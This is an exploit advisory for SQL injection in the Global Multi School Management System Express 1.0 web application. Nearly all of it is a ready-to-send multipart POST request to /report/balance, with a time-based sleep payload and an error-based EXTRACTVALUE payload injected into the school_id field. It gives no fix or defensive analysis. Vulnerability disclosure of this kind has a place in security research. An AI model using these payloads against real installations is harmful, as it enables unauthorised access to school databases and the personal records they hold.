Global Multi School Management System Express 1.0 SQL Injection

`# Exploit Title: Global - Multi School Management System Express v1.0- SQL Injection  
# Date: 2023-08-12  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378  
# Tested on: Kali Linux & MacOS  
# CVE: N/A  
  
### Request ###  
POST /report/balance HTTP/1.1  
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Referer: http://localhost  
Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f  
Content-Length: 472  
Accept-Encoding: gzip,deflate,br  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Host: localhost  
Connection: Keep-alive  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="school_id"  
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="academic_year_id"  
  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="group_by"  
  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="date_from"  
  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="date_to"  
  
------------YWJkMTQzNDcw--  
  
### Parameter & Payloads ###  
Parameter: MULTIPART school_id ((custom) POST)  
Type: error-based  
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY  
clause (EXTRACTVALUE)  
Payload: ------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="school_id"  
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND  
EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT  
(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="academic_year_id"  
  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="group_by"  
  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="date_from"  
  
------------YWJkMTQzNDcw  
Content-Disposition: form-data; name="date_to"  
  
------------YWJkMTQzNDcw–  
  
`